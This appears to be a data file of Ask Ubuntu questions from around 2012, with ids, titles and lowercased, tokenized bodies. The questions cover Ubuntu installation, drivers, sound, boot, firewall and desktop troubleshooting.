97153	install ubuntu server to a flash drive , permanently	first thing , i wanted to make sure , there is an understanding what this post is not about : this is not about creating bootable usb key this is not about simply booting from usb what i am looking to do is to have a home nas ( file ) server that boots from a usb stick or cf card . it is irrelevant for the point of this post how the flash drive is connected ( usb , ide , some other way ) , what is relevant : i want to have an entire operating system installation boot and run from flash drive . the reasons i want specifically this type of installation is : i want to be able to easily make a backup copy of operating system ( image the flash ) , i want to make sure i can swap operating system instantly and boot it ( by replacing flash drive ) , and i want drives on a file servers be replaceable separately from os . i am aware that it is possible to simply format flash drive as ext2 and install on it . what i am looking for is recommendations for creating more robust solution . here are a few items i am looking to do : configure root partition as yaff2 , or logfs , or as some other file system designed specifically for flash drives . reconfigure the base os to minimize writes ( ramfs in /tmp and such ) please submit your recommendations . i wonder if ubuntu is even applicable for such scenario really ... i want to clarify my goal a little bit . the regular ssd drives feature firmwares that will keep the drive alive for a long time by using tricks , such as : constantly reallocating writes to new sectors . usb sticks have no such firmware , so using regular file system could kill them fast . i am looking if it is possible to emulate ssd firmware by using file system designed for flash . in a sense , i am trying to make it so that usb drive could run a system in a normal fashion , as if it was an actual ssd .
97158	why is ubuntu permissive with outgoing connections by default ?	i am pretty newbie to linux , as most of computers for resources in my school use linux , i just installed ubuntu to learn . by default iptables and ufw sets policy as under : iptables -p input drop iptables -p forward drop iptables -p output accept ufw default deny ( default incoming ) . in both cases , linux all distros trust all applications including fames ftp , smtp , ssh , mail and all others allowing for outgoing traffic without notice or without concent . which in turn leaves all 0-to-65535 ports open for outgoing traffic for all installed applications . furthermore , there is no particular application control that which particular application like firefox , opera or other are granted access to internet in any firewalls so far i tried . all installed application can freely enjoys all freedom to access internet . in all major distros netstat is tempered to provide minimum information . my concern is security ... . how much security is offered by the os ( linux ) , which allows all outgoing traffic and just blocks the access to incoming ?
97159	bridge laptop 's ethernet to wireless	the laptop wirelessly connects to my router , while the desktop is connected to the laptop with an ethernet wire . the desktop successfully can use the internet if i set the connection to be shared on the laptop . the problem is , i need the laptop to forward the desktop 's packets across the link unmodified , so the desktop is on the same network as the router . the desktop needs its ip assigned by the router , so that i can access it from another computer as `` 192.168.1.8 '' .
97165	how to set default web browser , mail client , video player & music player in the system	i am trying to find the option that sets , for the whole system the default web browser , mail client , video player and music player instead of having to do it for each type of file . i knew where the option was in 11.04 but somehow i can not find it again . just to not get anymore confused i am not talking about right clicking a file then changing the `` open with '' to the one i want . the option i am looking for affects everything in general , so if i change , for example , the default video player to vlc , all movies will be watched with vlc . i am using unity .
97171	ca n't install fglrx or boot computer	i ran an update on ubuntu 11.10 to update to the 3.0.0-15-generic kernel today ( friday 20th january ) . i restarted the computer to find that i could not log in . i 'm using a dell studio 1555 laptop with radeon 4500 graphics driver . i was using the proprietary graphics driver . in recovery mode there is no option to boot into failsafe graphics mode ( see picture below ) after i pressed resume normal boot the computer appeared to be starting normally but then i got taken to a black screen . shortly after it said initcll : event failed i logged in via tty1 and then tried to install fglrx but was given this error : this is the contents of my xorg.conf file . i noticed that it says that it 's using the fglrx driver even though it is n't installed : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-lvds '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1366x768 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1366x768 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1366 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-lvds '' `` 0-lvds '' option `` monitor-dfp1 '' `` 0-dfp1 '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 2732 1920 depth 24 endsubsection endsection additionally , i ran locate fglrx and found that traces of the driver have been found in areas on my computer ( see below ) . how can i remove these ? i have tried running aticonfig -- uninstall but got the error one or more files have been altered since installation . uninstall will not be completed . see /etc/ati/fglrx-uninstall.log for details . can anyone help me to either uninstall the graphics driver completely or install fglrx again . thanks
97175	ca n't configure nvidia on my sony vaio vpceh2c1e/w	i have recently bought a sony vaio vpceh2c1e/w laptop on which i installed ubuntu 11.10 64bit os type the graphic card is 512 mb nv geforce 410m for which i chose ( version current ) [ recommended ] if i check system info , it says unknown the colours are ok , but ca n't adjust brightness in the screen settings ( basically nothing happens ) in the display settings menu i also get `` unknown '' i would appreciate if someone could assist me in solving this issue thank you
97176	how to prevent firefox from trimming the urls on the address bar ?	at some point fairly recently , the urls shown in the firefox location bar dropped the protocol prefix -- urls appear as `` askubuntu.com '' not `` http : //askubuntu.com '' -- if the site is https : // ... the prefix does appear , but i 'd like to see it all the time . how do i get that back ?
97179	is there an equivalent to fireshot for chrome	i love fireshot but it 's windows only , i do see that it comes for chrome as well but still windows only . anyone found anything for chrome on ubuntu ? related but still firefox : is there an equivalent to fireshot for firefox ?
97189	how can i install the livedvd in inside windows ( vmware ) ?	i have downloaded the ubuntu 11.10 ( 64bit ) livedvd . i have also installed it on my system ( with a partition ) successfully . now i need to experiment with linux so i want to install ubuntu in inside windows or vmware . vmware shows errors for 64bit ( no 64bit cpu ) , and `wubi.exe open the window with no installation button . there is no option for installation , only have demo and information . i tried this in two different systems ( both windows 7 32bit ) , both gave the same result . what is the problem ? can the livedvd be installed inside windows ?
97194	how do i mount a logfs-formatted file system ?	i am trying to mount a logfs-formatted file system on ubuntu server 11.10 . here 's what i 've done : # apt-get install logfs-tools # mkfs.logfs /dev/sda5 ... finished generating logfs # mount -t logfs /dev/sda5 /tmp/fs5 mount : unknown filesystem type 'logfs' am i missing a modprobe or something ?
97196	how secure is an encrypted luks filesystem ?	i recently installed 11.10 on a fresh disk using entire disk encryption . can someone tell me how secure the encryption algorithm is ? has there been any recent breaches with said algorithm ? i use a 36 character random passphrase so i know thats not a weak link . what are the chances my client 's data could be compromised if the hard drive was stolen ?
97197	create yaffs2 file system on ubuntu server 11.10	how do i create and mount a yaffs2 file system ?
97199	ftp over ssh hangs on `` connection established : waiting for welcome message ''	i have looked far and wide and have not quite found the answer . i am running ubuntu 11.10 , openssh , and vsftpd . i am trying to configure my ftp to tunnel over ssh . my ssh connection works just fine and i can create the tunnel to my ftp port . when i go to use filezilla to connect , it hangs at `` waiting for welcome message '' . i think it is an iptables issue , but i ca n't seem to figure out what needs to be changed . when i take iptables down , it connects just fine . i do n't want to open any more external ports , just my one ssh port , and i ca n't seem to get it right on the internal port forwarding rule . i always end up opening it to the outside . i would love some help if anyone has any ideas and i hope i have made it clear . thank you in advance ! !
97201	ubuntu install fails reporting insufficient space on asus eee pc ?	i have been running ubuntu on a virtual machine for a while now i 'm trying to install it on an old asus eeepc 1000he which has no cd/dvd reader/writer . i started by downloading ubuntu 10.04 livedisc iso and put it on a usb key using unetbootin.exe everything went fine , i got the machine to boot on the disk and install , i selected erase all existing data ( 160gb ) ( partitions section choice ) when the installation seems finish , i get an error window saying that there is 0 bytes available but whne you look at the window it opens when you click examine ... well i have 7gb used out of 160 gb ... i 'd really like to have some help my hypothesis is that the installing actually occurs on my pendrive , actually filling it and thinking there 's no more space while it should install on the harddrive . thanks in advance , pascal
97204	pulseaudio : why is there no sound ?	question : on ubuntu 11.10 , i have no sound volume control as root . i know this from earlier versions , as root you just had to manually start /usr/bin/pulseaudio , and then you got it . this is still so . but as of 11.10 , when i start /usr/bin/pulseaudio , i 've got no more sound . note that i can view flash , movies , mp3s/oggs etc . without problems , but as soon as i start pulseaudio , all the sound is gone . when i pkill pulseaudio , sound is back . now , till now it has only been annoying , and i simply used alsamixer on the console to control volume . now , i want to watch a flash movie on youtube , but the sound volume is just too low to understand anything without holding my ears less close than 1 mm to the speaker ... now i wanted to amplify the sound volume . so i first looked into installing a alsa amplifier , and found this : http : //alien.slackbook.org/blog/adding-an-alsa-software-pre-amp-to-fix-low-sound-levels/ but /etc/asound.conf is not present on my system ... so i looked into something pulseaudio : http : //r8n.org/amplify-linux-sound-output-for-quiet-laptop-seakers-using-pulseaudio-ladsp-plugin/ i installed the swh plugin and the pavucontrol : apt-get install swh-plugins apt-get install pavucontrol it seems to amplify well , as i see by the graphical output . but i still hear nothing because of my problem with pulseaudio ... what can i do ? i have a 64 bit system , in case that makes a difference .
97207	how to configure programs to automatically reopen after a gui reboot ?	i am looking for a way that when i press ctrl+alt+backspace ( which reboots the gui and sends me to the login screen ) and i enter my desktop again all my programs can autostart . for example firefox will all the tabs i had before the gui reboot , gedit opened with the tabs i had and any other program that was opened before i rebooted the gui .
97213	application-specific key combination remapping ?	i 'm aware of a number of ways of remapping key combinations in ubuntu on a global basis ( e.g. , globally remapping ctrl+s to send ctrl+d or something ) , such as the xbindkeys application . what i need , though , is a way to do this only for a specific application . for example , something like `` remap ctrl+s to send ctrl+d , but only in chrome '' . is there any way to accomplish this ?
97214	screen turns off on boot	so im dual booting windows 7 and ubuntu 11.10 using wubi , and when i turn on my computer it takes me to the boot manager screen and i pick ubuntu . after that it takes me to purple screen and askes me which version i want to boot ( normal or safe mode ) i pick normal . after i pick normal i get another purple screen and then my screen turns off and i cant see anything . is there a code or command i can out in to keep my screen on/
97217	sound broken after installing updates - no hardware present , but some programs play sound	my problem : sound has been working great for 2-3 months until 2 days ago , when i installed some recommended updates . after reboot i 've got the following issues : can not control master volume through gui volume keyboard buttons doesnt work either volume indicator icon shows 3 dashes : when i go to sound settings it tells me there is no sound device system sounds do n't work ( also thunderbird mail notifications ) sound works in many other programs , for example : banshee , chrome , firefox , skype if anyone could point me into the right direction , so i could find a solution , i would be very grateful .
97219	how to `` show desktop '' from command line ?	i want to be able to lower all windows and show the desktop from the command line , not ctrl+alt+d .
97224	5.1 surround system subwoofer not working	my subwo0fer is not working on ubuntu 11.10 . satellites are all working . it is part of a 5.1 soundsystem . i 've already googled and changed in the /etc/pulse/daemon.conf file these variables and rebooted : default-sample-channels = 6 ( it was `` 2 '' before ) enable-lfe-remixing = yes ( it was `` no '' before could it be possible , that i need a special audio driver ? the soundcard is onboard on my asrock 775i945gz . if yes where can i get a driver for ubuntu ? on windows xp i use `` realtek high definition audio driver ver : r1.47 '' ( from the asrock product support site ) edit 1 [ 21.01.2012 ] okay , i tried a bit more on my own . i found this website : link i found out my audio chip is a realtec alc888 i followed the instructions and added a line in /etc/modprobe.d/alsa-base.conf i tried out many capabilities but none of them made my subwoffer work ... there is n't even a subwoofer regulator in alsamixer ! now i wrote : options snd-hda-intel model=6stack-dig but it is like in pulseaudio : sattelites working , subwoffer silent . i do n't know what to do next ... please help ! edit 2 [ 21.01.2012 ] okay , now i found out that there is a linux driver for the high definition audio chipset from realtek i installed the latest one with sudo ./install it took like 2 minutes then it finished . i rebooted and now there are no sounds at all , there are no devices to configure in the audio options ! ! ! and i ca n't start alsamixer ! ! ! ! ! : o is it my fault ? what did i do wrong ? did i forget something ? please help ! ! ! edit 3 [ 21.01.2012 ] i wanted to reset also so i typed : wolfi @ wolfi-p4-3 : ~ $ sudo /etc/init.d/alsa-utils reset [ sudo ] password for wolfi : and then it says : sudo : /etc/init.d/alsa-utils : command not found did realtek destroy alsa ? ? ? : o
97231	dark text color on dark menu	after i rebooted 15 min ago , i noticed that unity clock and menu text changed to dark for apparently no reason , so i rebooted again in a hope to remedy . unfortunately still same : i launched appearance dialog , and tried to change themes , then revert to my favourite and very common dust theme , but for some reason i still get this dark text . i remember update manager did some updates today and i checked the log . i think i found the problem - among updated packages there was also update for `` light themes ( ambiance and radiance ) '' with this change log : light-themes ( 0.1.8.13.1 ) natty-proposed ; urgency=low [ andrea cimitan ] * do n't load gedit.rc custom settings , as they are introducing regressions ( lp : # 740864 ) -- paul sladen fri , 29 apr 2011 15:11:15 +0200 how to solve this problem ? should i downgrade this package or there is better solution ? update : strangely downgrading light-themes package did n't change anything .
97235	why does gmusicbrowser not integrate well with the sound menu ?	i 'm having a little issue with gmusicbrowser 's integration with the ubuntu 11.10 sound menu . after i installed the player , it appeared in the menu like it should , but it only opens one time per session . if i close it , it wo n't open anymore using the ubuntu sound menu - only if i use alt+f2 or a terminal . it just opens again using the menu after i logout or doing compiz -- replace . the other players i have in the menu open with no problem . gmusicbrowser also do n't have the play/pause/next/previous controllers . the other players do . why does this happen and how can i fix it ?
97240	what does it mean when a logon/username ends in a $	i am trying to hide certain user names from the the lightdm login screen ( ubuntu 11.10 ) i have found a work round by messing with uid 's . in getting this solution i have found in my /etc/passwd file a user name ending in $ sign , what does this mean ?
97254	ubuntu wo n't boot ( dual boot windows/ubuntu )	i recently installed ubuntu alongside windows , and the installation went fine , but when it said it had to restart to finish , i restarted it . when the computer turned back on , i was n't prompted to start with linux or windows , it just went straight to windows . how do i launch from linux , or even given the option to launch linux ?
97255	graphics driver details is not shown in my system inf	i have a dell latitude d630 system , no graphics driver data is available in system info window . do i need to install graphic driver ? if yes how to do it ? i 'm a very beginner to linux and ubuntu . dinesh .
97256	how do i disable messages or logging from printing on the console/virtual terminals ?	my wireless driver is noisy . it prints out messages to the console every 10-30 seconds . so , if i 'm working on vt1 or something , i get messages scrolling by all the time . is there a way to shut this feature off ? i like working on the virtual terminals , but this is making it hard to deal with . : ) any ideas ?
97257	ulimit -u gives illegal option error when running from a script but not when from a terminal	i have the following script : # ! /bin/sh echo `` output : '' gcc temp.c echo `` actop '' ulimit -t 1 ulimit -f 1024 ulimit -u 3 ./a.out > out.txt the output i get is output : actop ulimit : 7 : illegal option -u but if i use ulimit -u 3 in the terminal directly it works . the -t and -f options work fine however . when i change the shebang to # ! /bin/bash it works , but now it refuses to execute code unless the no . of allowed processes > 132 . anything less than ulimit -u 132 does not allow execution . in the terminal directly i was able to work with ulimit -u 3 .
97260	ca n't boot windows from grub	i bought my notebook with windows 7 . i , one day , decided to install linux . i did it , but i am unable to boot windows . when i turn the computer on , i get to grub . if i choose linux , i 'm good to go , but if i choose windows 7 instead , i get to a `` grub rescue '' prompt with a message saying : unknown file system please , help me . i really do n't know what to do . edit : sorry for my delay . i was n't able to access the internet in the past few days . none of these worked , and i had to reinstall windows using the recovery cd i made on the previous installation . thanks everyone for your support .
97264	how to install ubuntu restricted extras but not flash ?	like the title says ! i just want to know how to install ubuntu restricted extras without the flash packages .
97267	error running clementine	recently i installed clementine 1.0 media player . when i run the program , simply it crashes . here i describe the situation : $ clementine 22:27:59.162 debug networkproxyfactory:30 detected system proxy urls : ( `` '' , `` '' , `` '' , `` '' ) 22:27:59.162 debug coverproviders:34 registered cover provider `` amazon '' 22:28:00.822 info database:578 updating `` songs '' for % allsongstables 22:28:00.822 info database:578 updating `` magnatune_songs '' for % allsongstables 22:28:00.910 info database:578 updating `` songs '' for % allsongstables 22:28:00.910 info database:578 updating `` magnatune_songs '' for % allsongstables 22:28:01.366 info database:578 updating `` songs '' for % allsongstables 22:28:01.366 info database:578 updating `` magnatune_songs '' for % allsongstables 22:28:01.367 info database:578 updating `` jamendo.songs '' for % allsongstables 22:28:01.608 info database:578 updating `` songs '' for % allsongstables 22:28:01.608 info database:578 updating `` magnatune_songs '' for % allsongstables 22:28:01.609 info database:578 updating `` jamendo.songs '' for % allsongstables 22:28:02.015 info database:578 updating `` songs '' for % allsongstables 22:28:02.015 info database:578 updating `` magnatune_songs '' for % allsongstables 22:28:02.015 info database:578 updating `` jamendo.songs '' for % allsongstables 22:28:02.577 info database:578 updating `` songs '' for % allsongstables 22:28:02.577 info database:578 updating `` magnatune_songs '' for % allsongstables 22:28:02.578 info database:578 updating `` spotify_search_songs '' for % allsongstables 22:28:02.578 info database:578 updating `` jamendo.songs '' for % allsongstables 22:28:02.579 info database:578 updating `` playlist_items '' for % allsongstables 22:28:02.914 info database:578 updating `` songs '' for % allsongstables 22:28:02.915 info database:578 updating `` magnatune_songs '' for % allsongstables 22:28:02.916 info database:578 updating `` spotify_search_songs '' for % allsongstables 22:28:02.916 info database:578 updating `` jamendo.songs '' for % allsongstables 22:28:02.917 info database:578 updating `` playlist_items '' for % allsongstables 22:28:03.501 info player:533 registered url handler for `` di '' 22:28:03.501 debug internetmodel:94 adding internet service : `` digitallyimported '' 22:28:03.635 debug internetmodel:94 adding internet service : `` icecast '' 22:28:03.700 debug internetmodel:94 adding internet service : `` jamendo '' 22:28:03.759 debug unknown connected to accessibility bus at : `` unix : abstract=/tmp/dbus-96lpizpvgm , guid=4fc59d3beb26bd425de407800000003f '' 22:28:03.760 debug unknown registered dec : true 22:28:04.312 info player:533 registered url handler for `` lastfm '' 22:28:04.312 debug coverproviders:34 registered cover provider `` last.fm '' 22:28:04.313 debug internetmodel:94 adding internet service : `` last.fm '' 22:28:04.313 info player:533 registered url handler for `` grooveshark '' 22:28:04.314 info playlistmanager:417 registered special playlist type `` grooveshark-search '' 22:28:04.318 debug internetmodel:94 adding internet service : `` grooveshark '' 22:28:04.324 info player:533 registered url handler for `` magnatune '' 22:28:04.331 debug internetmodel:94 adding internet service : `` magnatune '' 22:28:04.365 debug internetmodel:94 adding internet service : `` savedradio '' 22:28:04.370 info player:533 registered url handler for `` sky '' 22:28:04.370 debug internetmodel:94 adding internet service : `` sky.fm '' 22:28:04.371 info player:533 registered url handler for `` somafm '' 22:28:04.371 debug internetmodel:94 adding internet service : `` somafm '' 22:28:04.372 debug spotifyservice:70 spotify system blob path : `` /usr/bin/clementine-spotifyblob '' 22:28:04.372 debug spotifyservice:71 spotify local blob path : `` /home/brallan/.config/clementine/spotifyblob/version11-32bit/blob '' 22:28:04.372 info playlistmanager:417 registered special playlist type `` spotify-search '' 22:28:04.372 debug internetmodel:94 adding internet service : `` spotify '' 22:28:04.473 warn iconloader:54 could n't load icon `` clementine-panel '' 22:28:04.507 warn iconloader:54 could n't load icon `` clementine-panel-grey '' 22:28:04.752 debug gnomeglobalshortcutbackend:50 registering 22:28:04.960 debug mainwindow:209 starting 22:28:05.530 debug mainwindow:267 initialising player 22:28:05.611 debug mainwindow:273 creating models 22:28:05.632 debug mainwindow:296 creating ui 22:28:05.735 debug mainwindow:663 creating equalizer 22:28:05.735 debug mainwindow:678 creating now playing widget 22:28:05.983 debug mainwindow:715 loading settings 22:28:06.152 debug mainwindow:761 initialising library 22:28:06.154 debug mainwindow:774 started 22:28:06.170 warn unknown invalid parent : 0xb6a2cab0 qtsingleapplication ( 0xbfae6b08 , name = `` clementine '' ) 22:28:06.174 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.176 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.182 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.183 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.187 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.190 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.203 warn unknown qaccessiblewidget : :rect : this implementation does not support subelements ! ( id 1 unknown for linetextedit ) 22:28:06.203 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.204 warn unknown qaccessiblewidget : :rect : this implementation does not support subelements ! ( id 2 unknown for linetextedit ) 22:28:06.204 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.205 warn unknown qaccessiblewidget : :rect : this implementation does not support subelements ! ( id 3 unknown for linetextedit ) 22:28:06.205 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.207 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.360 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.361 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.371 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.373 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.375 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.434 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.435 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.437 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.548 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.551 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.811 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.824 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.835 warn unknown requesting child objects for an interface that is a virtual child itself . 22:28:06.862 warn unknown creating accessible with different object than the original interface ! 22:28:06.865 warn unknown creating accessible with different object than the original interface ! 22:28:06.870 warn unknown creating accessible with different object than the original interface ! 22:28:06.873 warn unknown creating accessible with different object than the original interface ! 22:28:06.875 warn unknown creating accessible with different object than the original interface ! 22:28:06.877 warn unknown creating accessible with different object than the original interface ! 22:28:06.891 warn unknown creating accessible with different object than the original interface ! 22:28:06.892 warn unknown creating accessible with different object than the original interface ! 22:28:06.892 warn unknown creating accessible with different object than the original interface ! 22:28:06.892 warn unknown creating accessible with different object than the original interface ! 22:28:06.892 warn unknown creating accessible with different object than the original interface ! 22:28:06.892 warn unknown creating accessible with different object than the original interface ! 22:28:06.895 warn unknown creating accessible with different object than the original interface ! 22:28:06.896 warn unknown creating accessible with different object than the original interface ! 22:28:06.898 warn unknown creating accessible with different object than the original interface ! 22:28:06.900 warn unknown creating accessible with different object than the original interface ! 22:28:06.902 warn unknown creating accessible with different object than the original interface ! 22:28:06.903 warn unknown creating accessible with different object than the original interface ! 22:28:06.905 warn unknown creating accessible with different object than the original interface ! 22:28:06.907 warn unknown creating accessible with different object than the original interface ! 22:28:06.907 warn unknown creating accessible with different object than the original interface ! 22:28:06.907 error unknown assert : `` interface- > valueinterface ( ) '' in file accessible.cpp , line 280 aborted if somebody would help me please . thanks !
97272	how long does it take to complete the review stages in ubuntu ?	when we submit an application to the ubuntu software center , how long does it take to complete the review stages ? namely , pending review in review how long ( average or based on your experience ) does it take to complete each of these two stages ? and does the duration of reviewing change by type of application submitted ( for python , java , etc ) ? or is it all the same ? edit more details about my app : its a commercial app ( i put $ 2.99 as the price when submitting ) its a kakuro game ( but the name is `` sukaro '' ) it is made in java se without using any external libraries its not platform-specific ( as java is platform-independent ) i submitted it without packaging ( as i do n't know how ) . i submitted the single .jar file i provided all the required information ( such as screenshots , etc )
97276	why is n't my custom launcher appearing in the dash ?	i have a .desktop file created by x2go that i would like to appear in the dash ( and be able to drag to the launcher ) . i put it in ~/.local/share/applications ( as per this answer ) and applied chmod a+x ( and rebooted ) , but when i open the dash and search for it ( by typing `` tam '' ) , it does n't appear . the contents are : $ cat ~/.local/share/applications/tam.desktop [ desktop entry ] exec [ $ e ] =x2goclient -- sessionid=20120119165217270 icon=/usr/share/pixmaps/other/desktop.png name=tam x2go session startupnotify=true terminal=false type=application x-kde-substituteuid=false how do i get it to appear in the dash ?
97278	how can i make everything just assume i 'm running as the superuser ?	is there a way i can make things just assume that when i run them i am running them as a privileged administrator ( aka root ) ? i know it could be dangerous and all , but its a risk i 'm willing to take in the name of convenience .
97283	opening apps in ubuntu 11.10	i recently move on ubuntu from windows . i am facing too much problems . please give some web links so that i can easily learn ubuntu .
97285	how can i verify my virtual machine is using cpu virtualization ?	i have enabled cpu virtualization on my gigabyte ga-ma770t-up3p and have successfully installed ubuntu 11.10 i386 ( after amd64 failed to authenticate ) . i would like to know how i can verify whether or not my cpu virtualization is being used . i see activity on all 4 cores of my phenom ii x4 955 black ed . i 'm running ubuntu virtual machine in windows 7 pro host .
97288	log viewer cant open syslog after messing up groups	i was doing some virtualbox stuff today and i had so add my user to vbox group , well i did it wrong and i removed myself from sudoers . i used the recovery console and fixed it with this command : usermod -a -g admin myuser now i can sudo again , but i went to the graphical log viewer ( because ubuntu is booting kinda slower now and i wanted to see if i can find something there ) , and i see that it ca n't access syslog and other files from there because it says i do n't have permissions . previously i was able to see all the log files from `` system log viewer '' , without having to use sudo or anything , just launching it as my normal user . what could be happening ? btw , i know i can access syslog from any text editor with sudo , but i want to find why i was able to access it from the gui before without sudo and now i ca n't . i am using ubuntu 11.10
97292	any android managers like itunes available for ubuntu ?	i recently got my first smartphone and its a htc wildfire s. in windows , i installed doubletwist to manage and sync my music & video collection . but as my primary os is ubuntu ( 11.04 ) , are there any similar software to manage and sync my media collection to my android phone ? and if there are any , can it also work with the market like itunes does ? ( i mean , download from the pc and automatically install them to my android device ) . or just media will also be fine . so any recommendations anyone ?
97293	grub screen missing	hi i downloaded the updates required for ubuntu and then restarted the pc instead of the pink grub screen . i got a black screen saying press tab key for command lists . the command line had grub > . i am not able to see the ubuntu loading too . can anyone help on this one ?
97299	why are some characters incorrectly displayed when using texmaker ?	i use texmaker 3.0.2 ( default from 11.10 ) with the czech global language . some characters which are properly displayed in other applications do n't work in texmaker ( e.g . 贸 ) . it appears that texmaker uses some other input layer or something ( e.g . gedit works perfectly ) . the second thing is when editing tex file some characters from time to time get corrupted and are visible only parts of them . what 's wrong with texmaker ?
97308	wi-fi connection almost stops working after some time on an asus pce-n15	i have an asus pce-n15 in my pc , which i connect to my home network with networkmanager . i use `` wpa & wpa2 personal '' as a security method . the problem is that after some time wi-fi connection almost dies , stops working almost completely . why i say almost is because some packets do flow from time to time , i can ping something ( but with huge times like 1 second ) , but its exiguous , visiting sites does n't not work . nothing is written into syslog , dmesg shows nothing too . there were several topics on this , including some solutions like changing sysctl variable or lowering security level , but it does n't help . output from sudo lshw -class network : *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : f4:6d:04 : a2:61:06 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.0.0-12-generic firmware=n/a ip=192.168.0.103 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport : e800 ( size=256 ) memory : febfc000-febfffff
97310	how do i remove the messaging menu for just one user ?	how can i remove the entire messaging menu for one particular user ( and not all other users ) under unity or unity-2d in ubuntu 11.10 ?
97311	gnome nautilus - usb automount not working	nautilus does not show my usb devices in its devices pane . nor does it mount them automatically . looking at the syslog , i can see that kernel registers the event when i mount a device . obviously , gconf has all the necessary settings for nautilus set up . i 've searched internet for some info , tried some solutions like disabling legacy floppy in bios -- does not work . appreciate any help .
97312	how do i prevent the current kernel from being replaced in 11.10 ?	so how do i do it ? i ca n't find sypaptic , in where i remember that i could `` lock '' certain packages to ensure that they kept their current version .
97322	is hypermemory available ?	i have a radeon hd 4550 which supports up to 512 mb of shared memory . when i open the catalyst panel , in the information tab i see that my video memory is only 128 mb which is the base memory or the graphics card . is this shared memory feature supported in ubuntu ? and if yes how can i use it ? i use the latest propriety drivers that amd support page offers online .
97323	how do i list all users logged into gnome 3 ?	i use gnome 3 and i have 2 desktops on it ( 2 users ) . both of them are logged simultaneously and i navigate between desktops via switch user option . sometimes , my other desktop wo n't load and i kill that user via pkill -kill -u username command . now , i have more users but when i try who the console does not display other user . how can i see which users are logged into gnome3 in the same time ?
97325	enable thumbnail preview when uploading files in google chrome/firefox ?	i have google chrome and when i upload photos to facebook or imageshack i can not find a way to show thumbnails , only detail view . i also tried this in firefox . this is quite important as it is stopping my friend from switching to ubuntu over windows . included a picture of the file upload window , how do i change this to a thumbnail view rather than the current list ?
97326	how to always show all breadcrumbs in nautilus ?	when i open a directory in nautilus using a shortcut , for example `` desktop '' , the top bar is of nautilus is showing : left arrow , home , desktop . when i press the arrow , i get to see links to root and `` /home/ '' . how do i get it to never show the arrow , but instead always show all the parent directories ? i have seen tried always_use_location_entry , but it shows text instead of click-able links .
97335	how do i connect a mythtv frontend to a mythtv backend on mythbuntu 11.10 ?	how does one get the frontend to communicate with the frontend ? i have tried the default 127.0.0.1 on both front end and back end with default values for username and password , to no avail . i 've also tried the username and password that i had set on install , still no luck . what is the actual procedure ?
97338	why do thunderbird lightning notifications come late ?	it seems that the thunderbird integration to ubuntu is taking some time , and i 'm okay with that , i have workarounds for most things like keeping thunderbird open in the notification area , but there is one thing : the lightning notifications about events ( not ubuntu 's native notifications , but rather lightning 's pop-up window notifications ) , which i set usually to one hour before the event starts , never appear on time . they do appear , but much later on , and when i see them it 's usually after the event is finished . i checked if it 's a timezone problem in thunderbird or ubuntu , but in both places the timezone is set correctly . does anyone have an idea ? thanks in advance !
97339	in gnome shell , how to revise command of software icon ?	i want to add a parameter to a software . how to add parameter to command line of software icon ? i use ubuntu11.10 . thanks
97343	emerald installed but does n't show in software center or synaptic ?	i installed emerald using instructions from here ; i 've have had a nice play with it but would now like to remove it . the package does n't show in software centre or synaptic and is now causing me a little headache as i ca n't seem to google a solution , if i 'm completely honest , i 'm a little unsure of the install directory ( to use make then make uninstall ) . i 'm obviously new to linux and i 'm sure by now that 's blatant so my apologies if the answer is an easy one , i 've been using ( various flavours ) linux for about a month and have been a windows user for i do n't know how long ; i 'm not illiterate , i 'm simply new to linux so any advice here would be appreciated . thanks . edit : thank you very much for replying so quick . the code you provided just gave me not found errors for emerald but thanks for pointing me in the direction of checkinstall ; basically i run the same code as before and replaced make install with sudo checkinstall this reinstalled the package and created a .deb file ; i can now upgrade/remove the package in software centre or synaptic . thanks for your advice .
